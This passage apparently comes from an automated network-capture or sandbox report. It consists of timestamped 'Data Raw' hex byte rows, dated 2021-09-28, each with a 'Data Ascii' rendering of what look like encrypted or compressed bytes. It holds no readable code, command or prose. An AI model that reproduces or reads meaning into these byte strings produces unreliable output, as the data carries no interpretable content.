d8 d7 fc bd b7 31 73 ed 92 31 1b a2 26 b5 42 a6 3d fd 8a 24 ee 55 cb 8d f1 0e 75 13 56 37 4b be 98 77 c8 3e 27 72 45 bc 78 ce f4 7f 9a 81 7c aa c3 35
                                          Data Ascii: uS(s(Plh_nVmpF>/p/DJ,_oq^4oPFSciK26.)`[{x}AB]<x0cpT2p)GEmY<#n/)W:eVy'#?%BA!91s1&B=$UuV7Kw>'rEx|5
                                          2021-09-28 06:58:06 UTC111INData Raw: 37 58 cb 5b 4f e7 40 99 33 3e 8a 39 76 c8 c6 1b f3 81 03 54 bf 85 2c 72 ea 27 6b 48 69 69 59 de 9c d8 54 ba ca 45 d5 34 38 7f 82 57 30 90 70 a6 82 12 61 5f 18 d1 34 20 33 0b b5 b8 ec d6 45 f3 25 3c 1c 0d aa 6d 7b 4d f6 55 f3 16 23 e5 03 7c bf 0d eb 20 5d 00 04 ed 42 80 a9 1a 6a d3 d1 84 9e b2 1b bc c8 e8 b4 2e b9 08 fe 31 bb 68 ad 54 a8 b6 0c 5f 07 d2 88 29 69 f8 ed 1b 0c 07 f2 29 fe 5a 0f 49 e8 49 3c 74 f6 96 02 55 03 3f 9a de 90 db c5 90 97 c1 e0 54 68 bd a7 42 6b a8 3b 95 2c e3 a5 d9 51 94 6d c4 50 38 49 b1 d6 53 98 c9 fc 2b 0b 44 e4 f1 4b 81 1e 33 56 d9 ec 77 ad b6 f9 b8 54 ca 09 47 01 f7 cc aa e1 b6 6e 22 f1 ad 45 bb 58 74 6c 3b fb c1 1b 4e b4 5f 49 5f 00 da c0 65 71 65 81 e2 5a d8 db 10 b3 f9 4d f1 0e b6 82 c8 16 de 58 db 44 03 ba 70 cb 9d a0 41 3a
                                          Data Ascii: 7X[O@3>9vT,r'kHiiYTE48W0pa_4 3E%<m{MU#| ]Bj.1hT_)i)ZII<tU?ThBk;,QmP8IS+DK3VwTGn"EXtl;N_I_eqeZMXDpA:
                                          2021-09-28 06:58:06 UTC112INData Raw: f9 24 7f f8 1a d5 c4 1c e9 7b b1 e0 ee 4b a9 2d 31 9a 3d ad 5e 22 88 77 da ee ec 54 d2 89 d8 50 ac 0b 80 21 50 aa 56 89 7f 29 48 8c 7d 1d 7e e6 e6 6f 90 9f 7c fd c4 35 8d a8 52 22 e7 ff f5 5b a0 48 50 1f 24 d9 c0 26 f8 56 cc fa 48 1f eb 48 22 12 13 33 79 6a 73 a4 29 3d 7e 4d fb 7d 32 c6 28 58 b2 0e 46 ff 38 d0 87 1a ef c1 7f 32 eb f8 c8 85 e0 b2 d3 27 29 54 8d 62 10 bb ae b3 9c 20 79 43 e6 e6 a0 e1 bf bf a0 f4 ff 49 f5 33 3b f8 6d ea 12 50 40 ca 73 75 ac a1 5a 54 b6 bd a0 5b 38 a3 e1 83 e0 18 00 6e 66 7a a2 2c b0 f7 c8 22 c6 e9 d5 f2 fb 33 ee d7 53 3f 8a 7c 9b bb 21 8c 54 c3 29 2c 9d a7 09 17 3f 93 13 ee 12 99 4d 19 44 16 ab b9 08 de b8 9c fa 28 73 ea e5 2d 80 0e 28 9e df 70 0b ae d4 c9 a7 c1 c0 69 db 76 18 d9 73 ae 71 99 8c a2 6e a8 d4 a3 2c 86 85 24 ed
                                          Data Ascii: ${K-1=^"wTP!PV)H}~o|5R"[HP$&VHH"3yjs)=~M}2(XF82')Tb yCI3;mP@suZT[8nfz,"3S?|!T),?MD(s-(pivsqn,$
                                          2021-09-28 06:58:06 UTC113INData Raw: 20 e8 b0 e1 b5 33 0f f0 ad 4e cb 18 67 67 31 36 c2 0e 85 5f 7b 4d 61 08 54 7d 65 70 52 98 f4 51 de c0 33 90 07 4c d7 d6 a0 97 e6 0a cd 52 c7 55 08 a7 7f 0a 9c c6 d8 2b b4 5a 6a 9d 40 26 00 2a 61 7d 81 47 d6 88 dc f1 44 05 fe 4d 54 7b 18 81 b0 47 70 bf 8b 74 de 9d f0 10 e8 f5 a4 83 51 55 b7 d7 fd a3 65 3b 42 0d c3 ba d6 ee 9a fa 84 cc 6e bc d2 9b 32 9c 60 25 41 65 6f a5 07 dc da 8d 6e 46 9a 62 07 9e cd 7d 79 10 41 c4 dd b2 e1 0b 72 e4 c9 dc 11 5c e3 73 a9 b4 58 0d 22 d2 41 cc 37 4d a9 22 f1 ff 5b 8c 1e 69 29 de 5b 17 14 67 f9 b1 93 58 40 66 64 cf bc b2 1b 36 19 53 18 02 3a 17 45 a6 11 af f1 46 bd f9 a8 6e 2f 59 c1 cc 04 0b 24 d1 8e b4 97 19 02 47 96 d3 c9 c1 68 d5 ec 82 1b 87 08 50 cc 1e 37 ff 67 4d 2f bd 64 62 d7 39 36 6b 3a eb 5a 48 4a 93 c6 25 8c a9 d7
                                          Data Ascii: 3Ngg16_{MaT}epRQ3LRU+Zj@&*a}GDMT{GptQUe;Bn2`%AeonFb}yAr\sX"A7M"[i)[gX@fd6S:EFn/Y$GhP7gM/db96k:ZHJ%
                                          2021-09-28 06:58:06 UTC114INData Raw: 3d 78 01 67 9e 3b f8 54 09 11 9c 04 87 07 5b bf 9f d0 e5 4c 5f bf b1 49 6d af bd 8d 11 1d a5 e1 48 83 cb d0 59 20 95 43 5e 57 87 fd c7 bc 0b 55 e5 e2 44 78 70 d8 47 de 89 a6 6b 68 e9 b8 55 d0 e0 45 01 fc ff b9 e3 ba 1b 08 fa b2 75 2a 0e 58 67 32 2e de c7 01 b2 7e 7e 5a 13 d1 ca 67 7f 55 70 e6 76 d7 a2 38 89 f9 4b f0 c9 a5 8f e2 07 d5 46 ed ba 02 94 7c e5 9a f0 a7 c3 b0 59 65 95 bd a4 64 d1 71 76 98 79 38 9a fb fc 56 80 55 ba 4d 81 ca 91 bd c9 41 a6 9d 67 c4 96 fe 34 09 ee 76 8f 7e d7 11 d4 fd 35 0d 29 46 12 ec b2 ce e5 8b e0 90 e7 9d 43 ff 91 30 f8 b6 20 2e 9f 7d a0 1e d5 a6 7a 6f 57 97 12 c0 62 cc 5b 78 cd 41 e9 de b2 ed 66 80 8a 3e db c7 57 93 94 b8 bf 52 03 31 de 51 32 27 6a bd 62 0f fc 77 a8 0a 00 ca c3 48 1a 13 19 0e af bf a0 2e 9a 77 c8 d9 59 c0 59
                                          Data Ascii: =xg;T[L_ImHY C^WUDxpGkhUEu*Xg2.~~ZgUpv8KF|Yedqvy8VUMAg4v~5)FC0 .}zoWb[xAf>WR1Q2'jbwH.wYY
                                          2021-09-28 06:58:06 UTC115INData Raw: 40 e6 69 b8 90 14 f7 91 23 23 3c 33 72 f6 c6 43 5e 2b c2 45 a6 af 2f 00 bf 65 72 59 37 8a 8f d1 e8 09 08 47 92 e2 c6 79 99 1e cd 34 c4 e8 c6 81 60 e4 fd d8 53 51 8a 7c 9b b0 25 98 dd c0 29 22 5a a4 20 af 2e 9d c9 fa 06 28 4d 19 46 6f b4 b1 19 d0 83 a4 f9 2e 16 22 f6 29 f7 59 26 8f d5 63 06 0f 81 a7 53 c4 bd 28 f2 64 1d d1 53 a2 6a 9b 84 cd 15 af ca 57 42 63 97 26 e5 90 2b 67 a5 ae 71 b9 28 0c 51 9f b6 86 71 61 f8 7d 05 de ff 2e 8b f2 b5 0e 70 e7 19 e5 be 9c cd 87 b8 86 64 e8 cc e5 39 f0 33 f9 5a 5e bf 3f e8 7a da 4d 4a e1 5b b4 17 c0 8b 1f a2 cb c6 0d ee 62 fc ab a0 96 31 72 96 a7 74 4d 97 68 75 d8 94 f2 4b b0 4c d5 d5 30 27 64 7c 57 07 a7 7e b0 09 0c 7d 4c f2 d1 25 34 0d fe b1 94 e9 d5 7e 34 27 2d 13 3a b0 93 7a 6b f9 00 65 2e b1 11 f0 8a a2 26 d8 2d a2
                                          Data Ascii: @i##<3rC^+E/erY7Gy4`SQ|%)"Z .(MFo.")Y&cS(dSjWBc&+gq(Qqa}.pd93Z^?zMJ[b1rtMhuKL0'd|W~}L%4~4'-:zke.&-
                                          2021-09-28 06:58:06 UTC116INData Raw: 11 4c db 53 14 5e 2f 38 d8 3c 50 13 ac 9c e4 ca c7 d7 a7 a1 ab b5 5f 0b 29 cc 4a dd 2b 5f 48 10 23 e0 75 d5 50 07 d5 db 4d 18 67 89 05 b0 92 48 2d cd 2f ce b6 a1 4f ee e0 64 19 08 38 62 a9 aa 11 b8 e3 6d be 0c a9 53 51 52 02 b3 05 27 28 fa 14 03 9e 0b fc 81 86 d7 d0 cc f6 d9 ec 93 11 8b 06 bf ca 24 3d 5a 69 7a 57 4c 4d 73 d1 26 36 da 20 ec 53 4b 46 be 29 2f b4 a7 5f bc bb 5e 06 a6 40 4f 07 de f8 22 e5 38 04 5a 53 32 af 32 19 88 e2 d2 2f 25 01 e6 fd 74 98 8e b6 27 b3 23 8f 3f c8 b5 cb a0 25 90 96 80 54 7e ee bc 01 3b 00 c2 52 d7 f9 b4 8e 9d fd 5a b0 01 05 b3 3f a9 4f 39 87 6e a3 da ef 78 f4 90 c2 4c 5c 92 54 30 5c a5 03 58 67 3e 26 6b 70 0c 74 d8 e5 68 88 0f 7c bb c6 35 81 22 6d 2c f3 ed 8d 35 88 e0 5a bd 3f cc c0 e3 e6 5c cc fd 45 f0 db a6 39 13 4f 28 79
                                          Data Ascii: LS^/8<P_)J+_H#uPMgH-/Od8bmSQR'($=ZizWLMs&6 SKF)/_^@O"8ZS22/%t'#?%T~;RZ?O9nxL\T0\Xg>&kpth|5"m,5Z?\E9O(y
                                          2021-09-28 06:58:06 UTC118INData Raw: 7f 4a db a4 73 54 ba 5f d0 c4 24 39 81 83 7a 2e 8b 3f ba 2b 17 61 4e f2 cc ca 30 37 15 b7 90 fd c7 6d 37 2f b0 3d 25 bb 6c 14 93 f9 2b 6a 30 3d fc 0a 75 ba 20 f9 db 5c 2a 1b 69 52 56 a4 04 70 c6 c5 82 99 9f 0f 47 c9 c2 10 3d ac 18 f0 36 96 cb bc 51 bd 97 e3 5e 2b d3 8a 3f 19 1d 5a 29 25 77 39 3a fb 50 0d 4b db 87 2c 5f 90 27 bb 55 09 1d 80 c7 83 d4 d6 85 9a c7 1a 41 6c b0 ba 51 68 be a7 97 30 1d a5 e1 4d 91 41 6e c1 34 5e 8a 48 53 89 c6 ce 49 0a 68 eb eb 57 9d 62 f1 56 c8 e3 4c 94 69 c3 aa 44 ac 37 47 10 f3 ff ac 0e b0 37 1b da a8 7c 84 f0 8b 93 36 48 1b 11 90 ab 50 61 73 30 df ca 49 74 4d 8e 1a 5a de c0 3a 05 4e 4e 75 67 60 93 38 01 08 d4 ec 44 03 b9 7b f6 9a e8 46 8d 99 79 62 8a 9c b4 79 d6 62 f3 30 5b 48 2c ff e7 54 0e e8 b4 5f 89 00 a7 91 e1 63 b5 9c
                                          Data Ascii: JsT_$9z.?+aN07m7/=%l+j0=u \*iRVpG=6Q^+?Z)%w9:PK,_'UAlQh0MAn4^HSIhWbVLiD7G7|6HPas0ItMZ:NNug`8D{Fybyb0[H,T_c
                                          2021-09-28 06:58:06 UTC119INData Raw: a3 df 4f f8 2c 56 30 5b 10 9f 7d 73 2a 33 50 df 1d 78 c4 e0 46 53 96 54 ac d1 b8 8c 80 7c 21 f4 da 8b 00 b6 5e d6 82 35 d3 d6 52 fa 7f c9 e4 4d 26 79 8a 33 11 2f 12 bd 69 58 b4 2e b9 f7 fa ec a6 35 c0 2f 7c 29 b7 46 f5 10 d0 8e 0b e9 48 6c 2b d7 39 0a 86 ea bc d5 a2 f6 82 9e 6c 12 91 ae 9c 9d e0 6f 63 f6 ce 48 42 ae 96 bc f1 e3 b9 80 20 35 e3 75 da 07 42 49 42 d3 ca a1 a9 52 44 ad 47 67 6a 25 9f 78 ad e9 09 0d d4 a1 c2 a9 28 8c 36 6a 22 cc eb d0 d2 e7 e6 fd da 6d e9 8c 7c 91 b8 33 f7 8a e9 8a 26 8c a3 30 0d 2e 9d c3 eb 76 7c 49 31 19 78 bc b2 20 fa a9 91 fe 41 84 20 e7 27 9b 13 53 9d d1 61 1f 65 c9 d2 41 c0 c0 74 db 70 1b d9 7f ae 6c 9c 51 4c 04 aa d5 81 57 4f 85 2e cf f7 6e 66 a3 b3 ff 68 55 4a 51 8c 91 88 5b 64 ec 70 3c ca e8 d0 80 7c a7 35 74 9c 55 f5
                                          Data Ascii: O,V0[}s*3PxFST|!^5RM&y3/iX.5/|)FHl+9locHB 5uBIBRDGgj%x(6j"m|3&0.v|I1x A 'SaeAtplQLWO.nfhUJQ[dp<|5tU
                                          2021-09-28 06:58:06 UTC120INData Raw: 8e e7 5b ca c5 2c a3 5a 4d fb da 9e ae e7 16 d8 4f ef ac 01 b8 7a dc 74 e8 c8 30 99 ee 63 8a 9c 9b 72 c0 7c 69 af df c5 9b d1 e7 d8 09 e2 b3 54 43 04 96 91 75 63 b5 9c 4f 49 9d e1 11 e4 f5 4b 9e 69 71 8e d9 e5 e5 c1 b7 45 0d dc a0 d1 f1 8e c3 2c d3 63 48 fb 9f 3c ef 66 31 69 92 7d a0 12 fe 85 97 72 43 b9 fa 13 60 ca 47 e2 10 2e 38 dd a6 f3 1d 52 28 3e dd 1b 4e a4 5d af b4 54 0a b7 c6 4a cc 27 55 95 00 2c e8 5f f9 1b 06 d3 7d 4a 32 04 20 2b b2 93 58 8d a7 45 db a2 b1 e9 fa c8 51 12 20 ae 78 ba ad 39 a6 ec 72 a8 e1 b3 6d 01 6e 38 30 05 2d 13 34 fe fc 61 df da 8f a0 29 c0 f8 7b de f7 fc 47 98 01 a4 11 41 cd f9 78 7b 53 57 74 71 c0 3c 14 2f 33 eb 4d 6b 7b b7 38 22 cf f7 de be b1 70 1f 29 47 49 68 28 ed 36 f7 03 b1 4b 45 57 7b 22 19 8e fe 1f ef 20 12 ea 83 8e
                                          Data Ascii: [,ZMOzt0cr|iTCucOIKiqE,cH<f1i}rC`G.8R(>N]TJ'U,_}J2 +XEQ x9rmn80-4a){GAx{SWtq</3Mk{8"p)GIh(6KEW{"
                                          2021-09-28 06:58:06 UTC121INData Raw: 01 5c d4 a4 53 c6 ed a9 ec 68 0a ce 79 ac 76 91 7f cc 28 a3 aa 3a 43 4f 8f 28 fd f8 7a 66 b4 bd 6d 7f ab 4b 7c 94 c1 6f 79 72 fb 6e 12 c4 f9 c3 9d de a7 01 7c f8 e7 f5 97 a8 22 94 fb 6b 67 93 8d f2 56 25 33 82 16 30 43 3a 32 76 d6 31 9e e3 4a bb 64 c2 8b 33 ae df af e0 f0 9d 09 3b 43 84 34 74 94 b1 74 5f 7a 7e 59 cf 8b c7 72 44 5e fc d9 27 33 6f ed 4e 2a a0 72 b9 1f 01 76 5f e6 c6 2b 3b e5 01 9c a2 fb c7 45 1a 22 3c 10 0d 9f 6d 7b 4d d3 1a 60 16 29 d6 8a 74 ab 25 f8 2e 4e 11 13 71 52 9f b8 e5 78 f9 d2 94 99 93 79 75 c9 ee 1c 28 65 0f fc 36 99 d4 bf 47 b5 9e 0c 48 10 26 82 02 1e 8b fe 0c 0d 79 24 36 e0 ae 1d 62 ed 68 20 1c 65 55 02 53 1f 78 5a dc 90 db b9 68 9e d0 e2 57 2f 62 a0 42 67 d1 4a 93 2c e5 b3 a2 94 82 45 6d 3f c6 42 99 4b 40 97 dc cb a4 1c 44 ff
                                          Data Ascii: \Shyv(:CO(zfmK|oyrn|"kgV%30C:2v1Jd3;C4tt_z~YrD^'3oN*rv_+;E"<m{M`)t%.NqRxyu(e6GH&y$6bh eUSxZhW/bBgJ,Em?BK@D
                                          2021-09-28 06:58:06 UTC123INData Raw: 1b ae cd 33 3b f8 78 7d dd 44 65 62 bc 27 3c 78 3b e9 4b 43 5a b5 38 24 ba 8f de bf a0 68 19 2b 1d 4e 07 df e9 37 f1 01 a5 50 51 2e e8 c2 18 88 e2 6f 61 11 1a e2 fb 1d 84 9b af a0 96 25 a7 a2 db bd d0 80 55 86 0a 9b 51 1a df 21 10 39 0b d1 df c2 e5 8b 8e 3e fd 5c ad aa 1d a2 2c a5 5c 2e 9b 77 a3 27 4c 45 de 95 dd 70 bc 12 56 3a 4b b6 9a 77 4e 3a 27 7e 6b 90 7f ce f4 6f 83 93 45 ac d0 22 07 0b 7c 20 e6 5b 8b 25 b4 5c 72 75 34 d3 dd e1 ef 48 f5 da 5d 0e dc 9d be 1c 3b 3a 78 79 5e a3 3e 22 f4 58 fd a1 35 c0 13 9c 8b b7 4c ee 3c d5 a6 20 e7 5b 66 35 4e 16 c9 85 eb a9 c4 3e f7 94 89 e1 8d b2 bf be 29 e7 e5 48 e2 e6 81 e1 bf bf b9 e1 e3 b9 0f 24 35 ef 77 7f c3 41 49 45 d0 53 b2 81 f1 45 be 6f 62 60 8e 8b f4 94 f0 84 0b 76 b0 e1 ae 3a 89 18 df 2b 6e f0 c2 ed 35
                                          Data Ascii: 3;x}Deb'<x;KCZ8$h+N7PQ.oa%UQ!9>\,\.w'LEpV:KwN:'~koE"| [%\ru4H];:xy^>"X5L< [f5N>)H$5wAIESEob`v:+n5
                                          2021-09-28 06:58:06 UTC124INData Raw: 44 74 2b fb de ab 33 47 78 2d 77 9b 56 79 d1 08 17 8f f6 c8 d3 d6 9e e2 53 e5 40 44 b6 b4 40 16 3d b7 92 28 e1 df 49 44 80 41 4f bd 3a 43 93 4f 56 16 74 a9 31 0a 44 ea ff 58 fd f7 f5 56 dd ce 02 68 68 e5 d4 d6 be 32 43 2b f6 e0 b5 c0 b3 1b 59 f0 ad 44 dd 0e 74 7d 27 34 cd 29 a2 a0 7a 61 68 11 de d3 88 75 61 88 e1 76 b1 cb 2b 8f f9 5c ff cf ba 7a e3 3a d4 50 fe 5e 02 b8 70 eb 90 f9 cc 3a a0 5d 7d 74 97 9b 7a d3 1b fc 86 58 c2 e5 a5 f0 55 04 ca ca 54 57 1a 8e a6 df 70 b1 96 76 d1 80 1f 1a db e1 58 f9 fe 58 a6 d9 cd b4 d5 3a 48 13 cf a5 c5 f4 9e f4 84 2d 62 6e c6 b5 42 6a 61 27 45 1d 0e a1 18 d8 e1 ff 6f 57 9b 70 0f 6c df 55 6f 06 2a 23 22 b3 cb 1d 78 f0 bd dc 11 5e f2 d3 aa b4 58 3a 43 c0 4a c6 2d 5a a5 15 0f ef 73 b1 13 f8 d4 f3 54 13 68 89 04 b0 97 76 78
                                          Data Ascii: Dt+3Gx-wVyS@D@=(IDAO:COVt1DXVhh2C+YDt}'4)zahuav+\z:P^p:]}tzXUTWpvXX:H-bnBja'EoWplUo*#"x^X:CJ-ZsThvx
                                          2021-09-28 06:58:06 UTC125INData Raw: 26 8a f6 e7 43 fb 54 6c cd b0 93 b7 e8 d7 1f 23 20 35 f6 6b da e9 43 49 42 ee 29 d8 30 53 45 ba 7a 78 d2 16 a5 fb b4 f6 07 2c ee b0 e0 bd 23 92 36 e4 20 cc e7 ee 94 5d 7c fc dc 7f 7b 84 e6 b4 94 28 c5 81 ce 09 84 8c a9 18 03 3c b5 e4 fa 7d 6b 66 77 3c e0 bd b8 0c cb bb 0b dd 03 13 06 f8 3d aa ab 27 8f d1 7e 17 5c ef a4 53 c6 ea 05 8d fd 18 d9 7d a2 70 12 a4 e0 0a 8c cb b8 63 88 85 24 e7 f3 45 4b a7 aa 74 45 3f 34 c9 9e b2 9d 67 60 67 58 39 d5 ce cf 98 fe 7f 16 63 e2 04 dc 96 84 33 80 be f9 18 0a 8a e4 3d eb 22 18 39 72 b0 1d 2d 63 e1 8e 4f e1 4a ae 1a 16 a7 31 a8 ce ea 5b 8c 04 02 54 b9 9a 20 e8 a2 8f 65 62 76 7d 79 3f 9c d8 54 a7 77 fd d7 21 24 55 ec 28 b2 a1 78 a2 27 07 fb 7a da de 12 2e 0e 20 58 b8 ea c2 72 3e 0f 11 14 25 bd 47 15 39 62 2a 60 12 3c f9
                                          Data Ascii: &CTl# 5kCIB)0SEzx,#6 ]|{(<}kfw<='~\S}pc$EKtE?4g`gX9c3="9r-cOJ1[T ebv}y?Tw!$U(x'z. Xr>%G9b*`<
                                          2021-09-28 06:58:06 UTC127INData Raw: d2 d6 8f 46 7a 93 7d 16 4a a6 2f f6 16 2e 3c c3 8f 7d 2c 57 85 18 c2 2c 7a 23 a3 ab b4 45 3a 17 c3 4a ca 0c 2c c8 88 0e fe 73 b1 27 9c f0 f2 55 37 0c 36 25 00 91 5e 2f a1 4e e2 b4 a5 c7 73 a2 2f 81 09 32 7c a5 98 8b 8c c3 7c 88 ed 97 5f 95 44 d2 32 19 0f 04 d0 00 05 b4 6f aa 04 84 d7 d2 ca 3b 44 c9 be 1f be 1e ee ed 85 39 f8 78 62 53 6c 48 60 d1 20 16 16 4f 72 4a 43 51 aa 79 be 85 a2 d1 98 a4 19 30 e1 45 4f 07 c0 e7 1e dc 12 a7 5c 79 56 f9 ba 18 88 ec 6f 7c b8 37 cd e3 54 93 d8 8f 7f 9e 23 8f 21 d4 95 f7 aa 33 81 20 ff 22 f0 f8 20 14 2c 5b 4f eb eb fe 85 b9 79 dd be b8 27 1a bd 20 8c 62 2a 8a 77 9f 4e 90 cd d9 81 cd 47 30 89 73 1d 54 94 91 1b 47 ce 25 78 7c 06 50 e3 f6 6e 96 bf 3e d4 5f 34 8b 84 63 65 7d dc b7 2d 86 57 1f 9d c0 d1 d7 f0 f0 74 f0 f2 59 08
                                          Data Ascii: Fz}J/.<},W,z#E:J,s'U76%^/Ns/2||_D2o;D9xbSlH` OrJCQy0EO\yVo|7T#!3 " ,[Oy' b*wNG0sTG%x|Pn>_4ce}-WtY
                                          2021-09-28 06:58:06 UTC128INData Raw: 34 74 ad cc 15 dd 68 69 5d c1 f0 42 71 97 50 f6 ca 4d 02 8c 86 56 2b bf 6d 8e 15 10 61 59 dd bb 4a a8 1a 00 b4 a7 87 58 48 1c 29 1a 09 48 9b 65 7e 47 fb 37 48 3b 21 ef 09 5f c5 5b 7e 24 5d 02 0c 0e df a5 84 14 5f ca ae a2 86 9f 16 b9 d7 fe 3e 12 bd 1c ec 0f f9 b5 34 55 a2 9a 02 30 9d fd ae 20 3b 8c 82 3b 13 6d 33 29 e3 78 31 4c c3 7f 07 1d e7 cd 03 55 0d 08 fb 44 b5 fc d9 b2 80 a0 c4 65 45 b3 a2 5d 7c 96 9b 90 2c e5 8e a7 3b 19 44 67 54 27 32 03 68 7e 96 e5 cb c6 2b 72 eb fd 5a 9b 59 d9 54 d9 e0 70 04 16 76 a8 53 bb 2d 35 9b d3 cd a9 d6 ae 69 39 cc a8 44 d4 10 6d 44 1c 25 c9 17 ba cf 04 f8 69 00 de d5 05 ee 68 a3 e8 7c c1 a2 18 dd fc 4d fb cf bb ac cf 14 de 5f ed 2a 7d 21 71 f4 99 f5 bc a0 94 74 6c ac 89 c3 4f b2 65 7d 87 47 d1 b3 fa f3 55 08 c8 d9 2b ce
                                          Data Ascii: 4thi]BqPMV+maYJXH)He~G7H;!_[~$]_>4U0 ;;m3)x1LUDeE]|,;DgT'2h~+rZYTpvS-5i9DmD%ih|M_*}!qtlOe}GU+
                                          2021-09-28 06:58:06 UTC129INData Raw: 8a eb 90 09 ff 72 f8 17 c9 58 74 33 d9 37 5a b2 99 77 4a 3c 27 7e 56 9f 06 57 f5 6e 94 b5 c3 aa c6 35 11 a5 51 31 c1 d9 0d 23 a0 48 7a 2d 32 d3 d7 ea c3 71 df f0 5f 24 58 f4 aa 1a 3b 3e 59 f2 58 b2 38 ae d5 d7 fd 81 01 4c 3b 54 8a 97 d2 f8 38 c1 97 23 ce 59 60 24 e9 97 b7 1c eb ba c6 0f 68 82 9e 6d 9b 97 92 ad ad d6 7a 5c f6 ce 69 77 b8 b5 a8 fa fd b9 0e 22 35 ef 4b 74 ba d8 48 44 c0 67 3c a9 52 45 24 40 5b 5a 15 a8 6e 92 e9 09 2c d7 b7 e0 bd 23 92 36 e4 20 cc e7 ee 7c 5d 7c fc dc 7f 44 10 7c 91 b9 bd c6 b3 d3 0f 06 17 a9 18 1c 0e 36 ce f8 7d 72 46 31 6f 7b bc be 22 52 d5 08 f9 2e 18 00 7b 2d 8a 1f bd aa fc 73 22 54 5e a6 53 c0 e0 da f4 64 19 c6 74 95 4c 8a 81 cb 2e 28 aa 30 42 4f 81 04 7a eb 6d 66 3f 8f 5f 7e 73 6a cd 9f b2 99 58 b0 fa 7d 14 c1 c0 fd 88
                                          Data Ascii: rXt37ZwJ<'~VWn5Q1#Hz-2q_$X;>YX8L;T8#Y`$hmz\iw"5KtHDg<RE$@[Zn,#6 |]|D|6}rF1o{"R.{-s"T^SdtL.(0BOzmf?_~sjX}
                                          2021-09-28 06:58:06 UTC130INData Raw: f4 10 2b 47 d5 22 f2 fd 10 d1 bc a7 5a 53 18 ee 2b 19 88 f1 58 13 20 12 e6 c6 f4 f2 03 ae aa 98 03 22 3e db bd 40 8d 1e 95 2c b1 f1 69 f9 20 30 5f 10 d5 ce d9 fe 8b 8b 38 fd 5c 90 a5 64 3b 2d a4 4b 08 24 71 b5 24 74 71 f5 90 ef 78 da 13 56 30 7a c9 86 5f 67 26 0f 55 7e 1d 7e e4 72 10 09 94 54 ae e6 9a 8b 80 7c ba c2 d4 88 05 80 e7 5a bd 35 f3 aa f8 eb 5c c2 f9 71 23 d8 8a 35 31 bd 44 e0 6b 58 b6 18 84 f0 fa ec 3d 04 f9 29 72 aa 07 46 ff 38 e1 08 03 e3 5b 7f 2b eb 3c cb 85 ec 90 40 51 68 83 9e 69 21 03 bf bf 8b 6c c6 71 e7 e8 69 51 bf b5 a8 c5 78 99 23 20 2f c1 4c f0 c4 47 63 c6 ba de a7 a9 56 65 0c 65 76 48 a9 ad d9 83 cf 29 be 76 b0 e0 9d af 90 1e c9 35 e4 cc c6 fa 25 cf 7f a2 e2 65 8b 78 b1 0a 27 e3 9e 5b 0c 0b 9d 8f 38 af 2e 9d c9 d8 e9 65 4c 19 5b 51
                                          Data Ascii: +G"ZS+X ">@,i 0_8\d;-K$q$tqxV0z_g&U~~rT|Z5\q#51DkX=)rF8[+<@Qhi!lqiQx# /LGcVeevH)v5%ex'[8.eL[Q
                                          2021-09-28 06:58:06 UTC131INData Raw: 24 3c f4 bf b6 96 0c 30 a4 cd 45 1a 60 4a 42 1e 63 4a 4d 53 98 e3 bb bc 0b 44 f1 da 72 ab 73 f4 50 f3 60 24 f3 69 ef ad 73 6b 32 47 01 6c c5 8b e2 97 3b cd f1 ad 44 f4 99 7f 6c 31 38 ec 39 bd a3 7a 67 42 86 a4 53 77 74 49 ae 32 5a de d1 a2 ae d4 5f dd f0 63 84 e2 16 fe e2 cc 44 03 a7 54 dc b0 e8 c8 3c 9b df 1d 13 97 b7 6b f1 b6 7d 87 58 5c be fa e3 73 2e 34 b3 55 57 30 5d b2 d6 63 aa b7 4f f8 9f e1 1d dd 69 24 1b 7c 59 a2 fd 32 e3 d7 3a d8 28 f1 b3 e3 c5 4d eb 8f d3 43 42 df b7 39 f0 41 0f 6c 61 7c a6 32 54 b7 1f 6f 57 95 5d c8 60 cc 51 f5 32 03 2a fa 92 3f 09 7a 8b 1e fc 1d 5a 8c be 8a 9c 7f 10 3a c7 60 4a 58 df b7 11 0b de ae ae 19 06 4f fa 76 03 35 28 dc b0 93 5e 0f f4 6a cf b6 ba e0 71 e5 53 18 0e 18 fe c4 3e 10 a9 ea 52 74 f2 a8 7f be 63 ff 20 23 07
                                          Data Ascii: $<0E`JBcJMSDrsP`$isk2Gl;Dl189zgBSwtI2Z_cDT<k}X\s.4UW0]cOi$|Y2:(MCB9Ala|2ToW]`Q2*?zZ:`JXOv5(^jqS>Rtc #
                                          2021-09-28 06:58:06 UTC132INData Raw: 50 45 b8 4f f4 36 aa 89 f4 96 c9 f3 0c 76 b0 7a 98 11 89 38 e9 d8 cc e1 c4 da 03 eb fd dc 66 4c a6 7e 91 bf 0d 65 e0 58 28 26 88 89 e3 1c 2e 9d 53 dd 50 7f 6a 39 b9 79 bc b8 28 f3 a5 91 f8 31 11 08 ca 2f 8a 19 0d 0d af f8 05 74 c6 86 af c0 c0 6f 69 41 34 c8 5f 9d 9d 88 81 cd 24 9e da a9 43 51 ad 09 e5 eb 6b 4c 23 d4 eb 6e 55 4e 70 62 b2 99 78 e8 d8 50 06 fd c8 2d 8a de b6 36 5f ec 19 f4 a4 9d 1b ab 96 97 60 b9 09 9a a0 f5 31 86 3c a1 bf 3b 32 ea e4 73 5e c7 6a 4f 0b 3e 8a 13 ff c6 c0 31 e5 b5 2e 56 bd 83 1e f0 f9 3b 6a 44 6d 49 a6 de 9c d8 ce 9f 72 c1 f3 01 dd 7f 82 56 0b f8 76 a6 38 08 49 72 f5 d1 32 1b 99 7e 29 b9 ea c6 4d 31 26 3c 16 bf 9e 40 6a 61 db 2b 61 16 23 cf 53 7b ab 25 ff 0d 70 04 13 66 6f 06 d7 82 78 d5 c4 a2 89 9b 16 b9 52 cb 3b 2d 99 3c eb
                                          Data Ascii: PEO6vz8fL~eX(&.SPj9y(1/toiA4_$CQkL#nUNpbxP-6_`1<;2s^jO>1.V;jDmIrVv8Ir2~)M1&<@ja+a#S{%pfoxR;-<
